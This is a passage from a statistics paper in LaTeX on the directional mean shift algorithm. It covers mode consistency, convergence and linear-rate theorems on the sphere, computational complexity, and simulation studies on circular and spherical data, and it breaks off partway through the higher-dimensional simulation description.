\begin{theorem}
\label{Mode_cons}
Assume (D1), (D2'), (K1), and (M1-2). For any $\delta \in (0,1)$, when $h$ is sufficiently small and $n$ is sufficiently large,
\begin{enumerate}[label=(\alph*)]
\item there must be at least one estimated local mode $\hat{\bm{m}}_k$ within $S_k = \bm{m}_k \oplus \rho_*$ for every $\bm{m}_k \in \mathcal{M}$, and
\item the collection of estimated modes satisfies $\hat{\mathcal{M}}_n \subset \mathcal{M} \oplus \rho_*$ and there is a unique estimated local mode $\hat{\bm{m}}_k$ within $S_k=\bm{m}_k\oplus \rho_*$
\end{enumerate}
with probability at least $1-\delta$. In total, when $h$ is sufficiently small and $n$ is sufficiently large, there exist some constants $A_3, B_3 >0$ such that
$$\mathbb{P}\left(\hat{K}_n \neq K \right) \leq B_3 e^{-A_3nh^{q+4}}.$$
\begin{enumerate}[label=(c)]
\item The Hausdorff distance between the collection of local modes and its estimator satisfies $$\mathtt{Haus}\left(\mathcal{M},\hat{\mathcal{M}}_n \right) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^{q+2}}} \right),$$
as $h\to 0$ and $nh^{q+2} \to \infty$.
\end{enumerate}
\end{theorem}
The proof of Theorem~\ref{Mode_cons} is in Appendix~\ref{Appendix:Thm6_pf}. It states that
asymptotically, the set of estimated local modes are close to the set of true local modes and there exists a $1-1$ mapping between pairs of estimated and true local modes.
Thus, the local modes of the directional KDE are good estimators of the local modes of the population directional density.
\begin{remark}
Unlike the statement of Theorem 1 by \cite{Mode_clu2016}, the radius $\rho_*$ in (M2) for $\mathcal{M}$ to contain $\hat{\mathcal{M}}_n$ can be selected to be independent of the dimension of the data. The reason lies in the fact that the proof of statement (a) in Theorem \ref{Mode_cons} performs a Taylor's expansion to the third order and leverages the constant upper bound for the third-order partial derivatives. The same technique can be used to improve the original proof in Theorem 1 of \cite{Mode_clu2016} to obtain a dimension-free radius for mode consistency.
\end{remark}
\section{Computational Learning Theory of Directional Mean Shift Algorithm}
\label{Sec:Algo_conv}
In this section, we study the algorithmic convergence of Algorithm~\ref{Algo:MS}.
We start with the ascending property and convergence of Algorithm~\ref{Algo:MS}, and then prove the linear convergence of gradient ascent algorithms on the sphere $\Omega_q$. By shrinking the bandwidth parameter, the adaptive step size of Algorithm~\ref{Algo:MS} as a gradient ascent iteration on $\Omega_q$ can be sufficiently small so that the algorithm converges linearly to the estimated local modes around their neighborhoods. Finally, we discuss on the computational complexity of Algorithm~\ref{Algo:MS}.
\subsection{Ascending Property and Convergence of Algorithm \ref{Algo:MS}}
Let $\left\{\hat{\bm{y}}_s\right\}_{s=0}^{\infty}$ be the path of successive points generated by Algorithm~\ref{Algo:MS}.
The corresponding sequence of directional density estimates is given by
$$\hat{f}_h(\hat{\bm{y}}_s) = \frac{c_{h,q}(L)}{n} \sum_{i=1}^n L\left(\frac{1-\hat{\bm{y}}_s^T \bm{X}_i}{h^2} \right) \quad \text{ for } s=0,1,\dots.$$
\begin{theorem}[Ascending Property]
\label{MS_asc}
If kernel $L:[0,\infty) \to [0,\infty)$ is monotonically decreasing, differentiable, and convex with $L(0)<\infty$, then the sequence $\left\{\hat{f}_h(\hat{\bm{y}}_s) \right\}_{s=0}^{\infty}$ is monotonically increasing and thus converges.
\end{theorem}
At a high level, the proof of Theorem~\ref{MS_asc} follows from the inequality
\begin{equation}
L(x_2) -L(x_1) \geq L'(x_1) \cdot (x_2-x_1),
\label{MS_ineq}
\end{equation}
which is guaranteed by the convexity and differentiability of the kernel function $L$; see Appendix~\ref{Appendix:Thm8_10_11_pf} for details.
\begin{remark}
\label{Diff_Relax}
Note that the differentiability of kernel $L$ in Theorem \ref{MS_asc} can be relaxed.
The monotonicity and convexity of $L$ already imply that $L$ is differentiable except for a countable set of points
$\mathcal{N}$ (see Section 6.2 and 6.6 in \citealt{Real_Analysis}). Moreover, the left and right derivatives of $L$ on $\mathcal{N}$ exist and are finite.
Therefore, for any $x_1 \in \mathcal{N}$, we can replace $L'(x_1)$ in \eqref{MS_ineq} by any subgradient $g_{x_1}$ without impacting other parts of the inequality. Furthermore, as the left or right derivatives of the convex function $L$ are non-decreasing, any subgradient $g_{x_1}$ at point $x_1$ satisfies $L'(x_1^-) \leq g_{x_1} \leq L'(x_1^+)$; thus, \eqref{MS_ineq} holds.
\end{remark}
The ascending property of $\left\{\hat{f}_h(\hat{\bm{y}}_s) \right\}_{s=0}^{\infty}$ under the directional mean shift algorithm is not sufficient to guarantee the convergence of its iterative sequence $\{\hat{\bm{y}}_s\}_{s=0}^{\infty}$. To derive the convergence of $\{\hat{\bm{y}}_s\}_{s=0}^{\infty}$, we make the following assumptions on the directional KDE $\hat{f}_h$.
\begin{itemize}
\item {\bf (C1)} The number of local modes of $\hat{f}_h$ on $\Omega_q$ is finite, and the modes are isolated from other critical points.
\item {\bf (C2)} Given the current values of $n$ and $h>0$, we assume that $\hat{\bm{m}}_k^T \nabla \hat{f}_h(\hat{\bm{m}}_k) \neq 0$ for all $\hat{\bm{m}}_k \in \hat{\mathcal{M}}_n$, that is, $\sum\limits_{i=1}^n \hat{\bm{m}}_k^T \bm{X}_i \cdot L'\left(\frac{1-\hat{\bm{m}}_k^T \bm{X}_i}{h^2} \right) \neq 0$.
\end{itemize}
Condition (C1) is a weak condition when the uniform consistency (Theorem~\ref{unif_conv_tang}) and mode consistency (Theorem~\ref{Mode_cons}) are established. In reality, condition (C1) is implied by conditions (D1) and (M1-2) on $f$ as well as (D2') and (K1) on the kernel function $L$ with a probability tending to $1$ as the sample size increases and the bandwidth parameter decreases accordingly.
Condition (C2) may look strange at first glance; however, it is a reasonable and common assumption. In practice, it will be valid with those commonly chosen kernel functions, a reasonable sample size $n$, and a properly tuned bandwidth parameter $h>0$. More importantly, because the directional density $f$ is always positive around its local mode, the following lemma demonstrates that condition (C2) holds with probability tending to 1 as the sample size increases to infinity and the bandwidth parameter tends to 0 accordingly.
\begin{lemma}
\label{Rad_grad}
Assume conditions (D1) and (D2'). For any fixed $\bm{x} \in \Omega_q$, we have
$$h^2 \cdot \mathtt{Rad}\left(\nabla \hat{f}_h(\bm{x}) \right) \asymp h^2 \cdot \nabla\hat{f}_h(\bm{x}) = \bm{x} f(\bm{x}) C_{L,q} + o\left(1 \right) + O_P\left(\sqrt{\frac{1}{nh^q}} \right)$$
as $nh^q \to \infty$ and $h\to 0$, where $C_{L,q}=-\frac{\int_0^{\infty} L'(r) r^{\frac{q}{2}-1} dr}{\int_0^{\infty} L(r) r^{\frac{q}{2}-1} dr} > 0$ is a constant depending only on kernel $L$ and dimension $q$ and ``$\asymp$'' stands for an asymptotic equivalence.
\end{lemma}
The proof of Lemma~\ref{Rad_grad} can be found in Appendix~\ref{Appendix:Thm8_10_11_pf}.
With Lemma~\ref{Rad_grad}, we know that while the tangent component of $\nabla \hat{f}_h$ at each local mode is $0$,
its radial component is diverging; thus, condition (C2) holds asymptotically.
This is not a surprising result, because observations in a directional data sample are supported on the sphere and the directional KDE $\hat{f}_h$ would thus decrease rapidly when moving away from the sphere.
In addition, the limiting behavior of $\nabla \hat{f}_h$ determines the adaptive step size of the directional mean shift algorithm when it approaches the estimated local modes (see Section~\ref{sec:linear} for details). A similar asymptotic behavior of the step size of the mean shift algorithm in the Euclidean setting has been noticed by \cite{MS1995} and restated by \cite{Ery2016}.
We now state the convergence of Algorithm \ref{Algo:MS} under conditions (C1) and (C2).
\begin{theorem}
\label{MS_conv}
Assume (C1) and (C2) and the conditions on kernel $L$ in Theorem \ref{MS_asc}. We further assume that $L$ is continuously differentiable. Then, for each local mode $\hat{\bm{m}}_k \in \hat{\mathcal{M}}_n$, there exists a $\hat{r}_k >0$ such that the sequence $\{\hat{\bm{y}}_s\}_{s=0}^{\infty}$ converges to $\hat{\bm{m}}_k$ whenever the initial point $\hat{\bm{y}}_0 \in \Omega_q$ satisfies $\norm{\hat{\bm{y}}_0 -\hat{\bm{m}}_k}_2 \leq \hat{r}_k$. Moreover, under conditions (D1) and (D2'), there exists a fixed constant $r^* >0$ such that $\mathbb{P}(\hat{r}_k \geq r^*) \to 1$ as $h\to 0$ and $nh^q \to \infty$.
\end{theorem}
The proof of Theorem~\ref{MS_conv} is in Appendix~\ref{Appendix:Thm8_10_11_pf}. The theorem implies that when we initialize the directional mean shift algorithm (Algorithm~\ref{Algo:MS}) sufficiently close to an estimated local mode, it will converge to this mode.
\subsection{Linear Convergence of Gradient Ascent Algorithms on $\Omega_q$} \label{sec:linear}
We now discuss the linear convergence of gradient ascent algorithms on $\Omega_q$.
Because the sphere $\Omega_q$ is not a conventional Euclidean space but a Riemannian manifold,
the definition of a gradient ascent update is more complex. We first provide a brief introduction to some useful concepts from differential geometry.
The interested readers can consult Appendix \ref{sec::GH} for additional details.
An \emph{exponential map} at $\bm x\in \Omega_q$ is a mapping $\mathtt{Exp}_{\bm x}: T_{\bm x} \to \Omega_q$ such that a vector $\bm v\in T_{\bm x}$ is mapped to point $\bm y:=\mathtt{Exp}_{\bm x}(\bm v) \in \Omega_q$ with $\gamma(0) =\bm x, \gamma(1)=\bm y$ and $\gamma'(0)=\bm v$, where $\gamma: [0,1] \to \Omega_q$ is a geodesic.
An intuitive way of thinking of the exponential map evaluated at $\bm{v}$ on the sphere $\Omega_q$ is that starting at point $\bm x$, we identify another point $\bm y$ on $\Omega_q$ along the great circle in the direction of $\bm{v}$ so that the geodesic distance between $\bm x$ and $\bm y$ is $\norm{\bm{v}}_2$.
The inverse of the exponential map is a mapping $\mathtt{Exp}_{\bm x}^{-1}: U\subset \Omega_q \to T_{\bm x}$ such that $\mathtt{Exp}_{\bm x}^{-1}(\bm y)$ represents the vector in $T_{\bm x}$ starting at $\bm x$, pointing to $\bm y$, and with its length equal to the geodesic distance between $\bm x$ and $\bm y$.
$\mathtt{Exp}_{\bm x}^{-1}$ is sometimes called the logarithmic map.
On $\Omega_q$, the notion of \emph{parallel transport} provides a sensible way to transport a vector along a geodesic \citep{Geo_Convex_Op2016}. Intuitively, a tangent vector $\bm v\in T_{\bm x}$ at $\bm x\in \Omega_q$ of a geodesic $\gamma$ is still a tangent vector $\Gamma_{\bm x}^{\bm y}(\bm v) \in T_{\bm y}$ of $\gamma$ after being transported to point $\bm y$ along $\gamma$. Furthermore, parallel transport preserves inner products, that is, $\langle {\bm u},{\bm v} \rangle_{\bm x} =\langle \Gamma_{\bm x}^{\bm y}(\bm u), \Gamma_{\bm x}^{\bm y}(\bm v) \rangle_{\bm y}$.
The above concepts can be defined on a general Riemannian manifold; however, for our purposes, it suffices to focus on the case of $\Omega_q$.
Adopting the notation of \cite{Geo_Convex_Op2016},
a gradient ascent algorithm applied to an objective function $f$ on $\Omega_q$ (a Riemannian manifold) is written as
\begin{equation}
\label{grad_ascent_Manifold}
\bm{y}_{s+1} = \mathtt{Exp}_{\bm{y}_s}\left(\eta \cdot \mathtt{grad}\, f(\bm{y}_s) \right).
\end{equation}
Recall that given a sequence $\left\{\bm{y}_s \right\}_{s=0}^{\infty}$ converging to $\bm{m}_k \in \mathcal{M}$, the convergence is said to be linear if there exists a positive constant $\Upsilon <1$ (rate of convergence) such that $\norm{\bm{y}_{s+1} -\bm{m}_k} \leq \Upsilon \norm{\bm{y}_s -\bm{m}_k}$ when $s$ is sufficiently large \citep{Boyd2004}. In our context, the norm $\norm{\cdot}$ refers to the geodesic (or great-circle) distance $d(\bm{x},\bm{y})=\norm{\mathtt{Exp}_{\bm x}^{-1}(\bm{y})}_2$ between two points $\bm{x},\bm{y}\in \Omega_q$.
An equivalent statement of linear convergence is that the algorithm takes $O(\log(1/\epsilon))$ iterations to converge to an $\epsilon$-error of $\hat{\bm{m}}_k$.
Here, we first prove the linear convergence results for the gradient ascent algorithm with $f$ and $\hat f_h$ on $\Omega_q$ under a feasible range of step size $\eta$.
We then demonstrate that the directional mean shift algorithm is an exemplification of the gradient ascent algorithm on $\Omega_q$ with an adaptive step size, and that its step size eventually falls into the feasible range with a properly tuned bandwidth parameter. Using the notation in \cite{Geo_Convex_Op2016}, we let $\zeta(1, c) \equiv \frac{c}{\tanh(c)}$. One can show by differentiating $\zeta(1, c)$ that $\zeta(1, c)$ is strictly increasing and $\zeta(1, c) > 1$ for any $c>0$.
\begin{theorem}
\label{Linear_Conv_GA}
Assume (D1) and (M1).
\begin{enumerate}[label=(\alph*)]
\item \textbf{Linear convergence of gradient ascent with $f$}: Given a convergence radius $r_0$ with $0< r_0 \leq \sqrt{2-2\cos\left[\frac{3\lambda_*}{2(q+1)^{\frac{3}{2}}C_3} \right]}$, the iterative sequence $\left\{\bm{y}_s\right\}_{s=0}^{\infty}$ defined by the population-level gradient ascent algorithm \eqref{grad_ascent_Manifold} satisfies
$$d(\bm{y}_s, \bm{m}_k) \leq \Upsilon^s \cdot d(\bm{y}_0, \bm{m}_k) \quad \text{ with } \quad \Upsilon = \sqrt{1-\frac{\eta\lambda_*}{2}},$$
whenever $\eta \leq \min\left\{\frac{2}{\lambda_*}, \frac{1}{(q+1)C_3\zeta(1,r_0)} \right\}$ and the initial point $\bm{y}_0 \in \left\{\bm{z}\in \Omega_q: \norm{\bm{z}-\bm{m}_k}_2 \leq r_0 \right\}$ for some $\bm{m}_k \in \mathcal{M}$.
We recall from Section~\ref{Sec:Mode_Const} that $C_3$ is an upper bound for the derivatives of the directional density $f$ up to the third order, $\lambda_*>0$ is defined in (M1), and $\mathcal{M}$ is the set of local modes of the directional density $f$.
\end{enumerate}
We further assume (D2') and (K1) in the sequel.
\begin{enumerate}[label=(b)]
\item \textbf{Linear convergence of gradient ascent with $\hat{f}_h$}: Let the sample-based gradient ascent update on $\Omega_q$ be $\hat{\bm{y}}_{s+1} = \mathtt{Exp}_{\bm{y}_s}\left(\eta\cdot \mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s) \right)$. With the same choice of the convergence radius $r_0>0$ and $\Upsilon=\sqrt{1-\frac{\eta\lambda_*}{2}}$ as in (a), if $h\to 0$ and $\frac{nh^{q+2}}{|\log h|} \to \infty$, then for any $\delta \in (0,1)$,
$$d\left(\hat{\bm{y}}_s,\bm{m}_k \right) \leq \Upsilon^s \cdot d\left(\hat{\bm{y}}_0,\bm{m}_k \right) + O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+2}}} \right)$$
with probability at least $1-\delta$, whenever $\eta \leq \min\left\{\frac{2}{\lambda_*}, \frac{1}{(q+1)C_3\cdot\zeta(1,r_0)} \right\}$ and the initial point $\hat{\bm{y}}_0 \in \left\{\bm{z}\in \Omega_q: \norm{\bm{z}-\bm{m}_k}_2 \leq r_0 \right\}$ for some $\bm{m}_k \in \mathcal{M}$.
\end{enumerate}
\end{theorem}
The proof of Theorem~\ref{Linear_Conv_GA} is in Appendix~\ref{Appendix:Thm12_pf}. As shown in (a) of Theorem~\ref{Linear_Conv_GA}, the linear convergence radius of gradient ascent algorithm \eqref{grad_ascent_Manifold} on $\Omega_q$ generally depends on the lower bound $\lambda_*$ on absolute eigenvalues of the Riemannian Hessian $\mathcal{H} f(\bm{x})$ (within the tangent space $T_{\bm{x}}$), the upper bound $C_3$ for the (partial) derivatives of $f$ up to the third order, and manifold dimension $q$.
In practice, we are more interested in the algorithmic convergence rate of sample-based gradient ascent algorithms with directional KDEs to the estimated local modes $\hat{M}_n$. As indicated by Theorem \ref{unif_conv_tang}, the Hessian matrices of $\hat{f}_h$ at its local modes have only negative eigenvalues within the corresponding tangent spaces given (M1), sufficiently small $h$, and sufficiently large $\frac{nh^{q+4}}{|\log h|}$. In reality, unless the data configuration is highly abnormal, the local modes of directional KDEs are non-degenerate and $\hat{f}_h$ is geodesically strongly concave (see Appendix \ref{sec::GH} for a precise definition) around small neighborhoods of the estimated local modes. Together with an application of smooth kernels, says the von Mises kernel, $\hat{f}_h$ is $\beta$-smooth on $\Omega_q$ and, consequently, a sample-based gradient ascent algorithm with the directional KDE $\hat{f}_h$ converges linearly to the estimated local modes around their small neighborhoods, given a proper step size.
With respect to the directional mean shift algorithm, we recall from the fixed-point equation \eqref{fix_point_grad} that the geodesic distance between $\hat{\bm{y}}_{s+1}$ and $\hat{\bm{y}}_s$ (one-step iteration) is
$$\arccos\left(\frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)^T \hat{\bm{y}}_s}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2} \right).$$
To derive the adaptive step size $\hat{\eta}_s$ of the directional mean shift algorithm as a sample-based gradient ascent iteration $\hat{\bm{y}}_{s+1} = \mathtt{Exp}_{\hat{\bm{y}}_s}\left(\hat{\eta}_s\cdot \mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s) \right)$ on $\Omega_q$, we notice the following geodesic distance equation:
$$\norm{\hat{\eta}_s \cdot \mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s)}_2 = \arccos\left(\frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)^T \hat{\bm{y}}_s}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2} \right).$$
This shows that the directional mean shift algorithm is a gradient ascent method on $\Omega_q$ with an adaptive step size
$$\hat{\eta}_s = \arccos\left(\frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)^T \hat{\bm{y}}_s}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2} \right) \cdot \frac{1}{\norm{\mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s)}_2}$$
for $s=0,1,...$. We denote the angle between the total gradient estimator $\nabla \hat{f}_h(\hat{\bm{y}}_s)$ and $\hat{\bm{y}}_s$ by $\hat{\theta}_s$. By the orthogonality of $\hat{\bm{y}}_s$ and $\mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s)\equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\hat{\bm{y}}_s) \right)$, the expression for the adaptive step size $\hat{\eta}_s$ becomes
$$\hat{\eta}_s = \frac{\hat{\theta}_s}{\left(\sin \hat{\theta}_s \right) \cdot \norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2}$$
for $s=0,1,...$. As the directional mean shift algorithm approaches a local mode of $\hat{f}_h$, $\hat{\theta}_s$ tends to 0 and $\frac{\hat{\theta}_s}{\sin \hat{\theta}_s}$ is approximately equal to 1. Thus, the step size $\hat{\eta}_s$ is essentially controlled by the (Euclidean) norm of the total gradient estimator, that is, $\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2$. The larger the norm of $\nabla \hat{f}_h(\hat{\bm{y}}_s)$ at step $s$, the shorter the step size of Algorithm~\ref{Algo:MS}. Because the tangent component of $\nabla \hat{f}_h(\hat{\bm{y}}_s)$ is small around the estimated local modes, its radial component $\mathtt{Rad} \left(\nabla \hat{f}_h(\hat{\bm{y}}_s) \right)$ dominates the norm $\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2$.
Lemma~\ref{Rad_grad} suggests that $\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2$ can be sufficiently large as the sample size increases to infinity and the bandwidth parameter decreases to 0 accordingly; therefore, one can always select a small bandwidth parameter $h$ such that the step size $\hat{\eta}_s$ lies within the feasible range for linear convergence. Algorithm~\ref{Algo:MS} thus converges (at least) linearly around the local modes of the directional KDE $\hat{f}_h$.
\subsection{Computational Complexity}
\label{Sec:Com_Complexity}
Given a fixed data set $\{\bm{X}_1,...,\bm{X}_n\} \subset \Omega_q$, the time complexity of Algorithm \ref{Algo:MS} is $O(n\times q)$ for one iteration of the algorithm on a single query point. When Algorithm~\ref{Algo:MS} is applied to the entire data set as the set of query points, each iteration exhibits $O(n^2\times q)$ time complexity. Assuming that the algorithm converges linearly, the total time complexity for reaching an $\epsilon$-error is $O\left(n^2\times q\times \log(1/\epsilon) \right)$. The space complexity of mode clustering with Algorithm~\ref{Algo:MS} is, in general, $O(n\times q)$ if mode clustering is performed on the entire data set to estimate the directional density and only the current set of iteration points are stored in memory. Algorithm \ref{Algo:MS} inevitably faces a computational bottleneck or even inferior performance when the (intrinsic) dimension $q$ is large. This drawback of the algorithm results not only from its time and space complexity, but also from its original dependency on nonparametric density estimation, which is known to suffer from \emph{the curse of dimensionality}.
\section{Experiments}
\label{Sec:Experiments}
In this section, we present our experimental results of the directional mean shift algorithm on both simulated and real-world data sets. Unless stated otherwise, we use the von Mises kernel $L(r)=e^{-r}$ in the directional KDE \eqref{Dir_KDE} to estimate the directional densities and their derivatives. Given the data sample $\{\bm{X}_1,...,\bm{X}_n\}$, the default bandwidth parameter is selected via the rule of thumb in Proposition 2 in \cite{Exact_Risk_bw2013}:
\begin{equation}
\label{bw_ROT}
h_{\text{ROT}} = \left[\frac{4\pi^{\frac{1}{2}} \mathcal{I}_{\frac{q-1}{2}}(\hat{\nu})^2}{\hat{\nu}^{\frac{q+1}{2}}\left[2 q\cdot\mathcal{I}_{\frac{q+1}{2}}(2\hat{\nu}) + (q+2)\hat{\nu} \cdot \mathcal{I}_{\frac{q+3}{2}}(2\hat{\nu}) \right]n} \right]^{\frac{1}{q+4}}
\end{equation}
for $q\geq 1$, which is the optimal bandwidth for the directional KDE that minimizes the asymptotic mean integrated squared error when the underlying density is a von Mises-Fisher density and the von Mises kernel is applied. The estimated concentration parameter $\hat{\nu}$ is given by (4.4) in \cite{spherical_EM} as
$$\hat{\nu} = \frac{\bar{R}(q+1-\bar{R}^2)}{1-\bar{R}^2},$$
where $\bar{R} = \frac{\norm{\sum_{i=1}^n \bm{X}_i}_2}{n}$ (see also \cite{Sra2011} for a detailed discussion and experiments on the numerical approximation of the concentration parameter for von Mises-Fisher distributions). We also perform mode clustering \citep{Mode_clu2016} (sometimes called mean shift clustering in \citealt{MS1975, MS1995}) on the original data sets in our simulation studies, in which data points are assigned to the same cluster if they converge to the same (estimated) local mode. When such procedure is carried out on the entire data space, it partitions the space into different regions called \emph{basins of attraction} of the (directional) KDE.
As the true density component from which a data point is generated is known a priori in our simulation studies (i.e., we know the label of each observation), we also provide the misclassification rates or confusion matrices of mode clustering with the directional mean shift algorithm, though one should be aware that mode clustering, by its nature, embraces non-overlapping basins of attraction \citep{Morse_Homology2004,chacon2015population}. Figures~\ref{fig:Two_d_ThreeM}, \ref{fig:Mars_data}, and \ref{fig:Earthquake} in this section as well as Figures~\ref{fig:Two_d_OneM} and \ref{fig:Mode_clu_Mars} in Appendix~\ref{Appendix:Ad_Experiments} are plotted via the Matplotlib Basemap Toolkit (\url{https://matplotlib.org/basemap/}).
\subsection{Simulation Studies}
\subsubsection{Circular Case}
To evaluate the effectiveness of Algorithm~\ref{Algo:MS}, we first randomly generate 60 data points from a circular density
$$f_1(x)=\frac{e^{-|x|}}{4(1-e^{-\pi})}\cdot \mathbbm{1}_{[-\pi,\pi]}(x)+\frac{1}{4\pi \mathcal{I}_0(6)}\exp\left[6 \cos\left(x-\frac{\pi}{2} \right) \right],$$
which is a mixture of a Laplace density with mean 0 and scale 1 truncated to $[-\pi,\pi]$ and a von Mises density with mean $\frac{\pi}{2}$ and concentration parameter $\nu=6$. The von Mises(-Fisher) distributed samples are generated via rejection sampling with the uniform distribution as the proposal density. The true local modes are 0 and $\frac{\pi}{2}$ in terms of angular representations or $(0,0)$ and $(0,1)$ in Cartesian coordinates. The directional KDE on the simulated data and directional mean shift iterations are presented in Figure~\ref{fig:One_d_MS}. The bandwidth parameter here is selected as $h=0.3 < h_{\text{ROT}} \approx0.4181$ because the aforementioned rule of thumb $h_{\text{ROT}}$ tends to be oversmoothing when the underlying density is not von Mises distributed. In addition, the tolerance level for terminating the algorithm is set to $\epsilon=10^{-7}$.
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step0.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step11.pdf}
\caption{Step 11}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step_conv.pdf}
\caption{Step 45 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step0_cir.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step11_cir.pdf}
\caption{Step 11}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step_conv_cir.pdf}
\caption{Step 45 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_MC.pdf}
\caption{Mode clustering (viewed on function values)}
\end{subfigure}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_MC_cir.pdf}
\caption{Mode clustering (viewed on $\Omega_1$)}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on simulated data on $\Omega_1$.
{\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) on a unit circle.
{\bf Panel (g) and (h):} Visualization of the affiliations of data points after mode clustering.}
\label{fig:One_d_MS}
\end{figure}
Figure~\ref{fig:One_d_MS} empirically demonstrates the validity of Algorithm~\ref{Algo:MS} on the unit circle $\Omega_1$, in which all the simulated data points converge to the local modes of the circular density estimator. In addition, the misclassification rate in this simulation study is 0.1.
\subsubsection{Spherical Case} \label{sec:spherical}
We simulate 1000 data points from the following density
$$f_3(\bm{x}) = 0.3\cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_1,\nu_1)+ 0.3\cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_2,\nu_2) + 0.4\cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_3,\nu_3)$$
with $\bm{\mu}_1 \approx (-0.35, -0.61,-0.71)$, $\bm{\mu}_2 \approx (0.5,0,0.87)$, $\bm{\mu}_3=(-0.87,0.5,0)$ (or $[-120^{\circ},-45^{\circ}]$, $[0^{\circ},60^{\circ}]$, $[150^{\circ},0^{\circ}]$ in their precise spherical [longitude, latitude] coordinates), and $\nu_1=\nu_2=8$, $\nu_3=5$. The bandwidth parameter is selected using \eqref{bw_ROT}, and the tolerance level for terminating the algorithm is again set to $\epsilon=10^{-7}$. The results are presented in Figure \ref{fig:Two_d_ThreeM}.
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/MS_TripMode_Step0_cyl.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/MS_TripMode_MidStep_cyl.pdf}
\caption{Step 5}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/MS_TripMode_Step_conv_cyl.pdf}
\caption{Step 28 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_Step0_ortho.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_MidStep_ortho.pdf}
\caption{Step 5}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_Step_conv_ortho.pdf}
\caption{Step 28 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.8\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_MC_affi.pdf}
\caption{Mode clustering (Hammer projection view)}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on simulated data with three local modes on $\Omega_2$.
{\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm displayed in a cylindrical equidistant view.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) in an orthographic view.
Note: two local modes are at the back of the sphere; thus, we cannot directly see them.
{\bf Panel (g):} Clustering result under the Hammer projection (page 160 in \citealt{Snyder1989album}).}
\label{fig:Two_d_ThreeM}
\end{figure}
In Figure~\ref{fig:Two_d_ThreeM}, all simulated data points converge to the local modes of the estimated directional density under the application of Algorithm~\ref{Algo:MS}; therefore, all the original data points are clustered according to where they converge. The confusion matrix in this simulation study is $\begin{bmatrix}
\bm{278} & 0 & 9\\
0 & \bm{323} & 1\\
20 & 8 & \bm{361}\\
\end{bmatrix}$ and the misclassification rate is thus 0.038.
Moreover, the total number of iterative steps is much lower than the case with a single mode in Appendix~\ref{Appendix:Two_d_OneM} (Figure~\ref{fig:Two_d_OneM}). We also observe that most of data points already converge to the local modes of the directional KDE after a few initial steps, while most of the subsequent iterations handle those points that are geodesically far away from an estimated local mode and have small estimated (tangent/Riemannian) gradients on their iterative paths.
\subsubsection{$q$-Directional Case with $q>2$}
Our algorithmic formulation of the directional mean shift algorithm (Algorithm~\ref{Algo:MS}) and its associated learning theory are valid on any general (intrinsic) dimension $q$ of $\Omega_q$. For this reason, we are also interested in how the algorithm behaves as the dimension $q$ of directional data increases. We randomly simulate 1000 data points from each of the following densities repeatedly,
$$\sum\limits_{i=1}^4 0.25 \cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_{i,q},\nu')$$
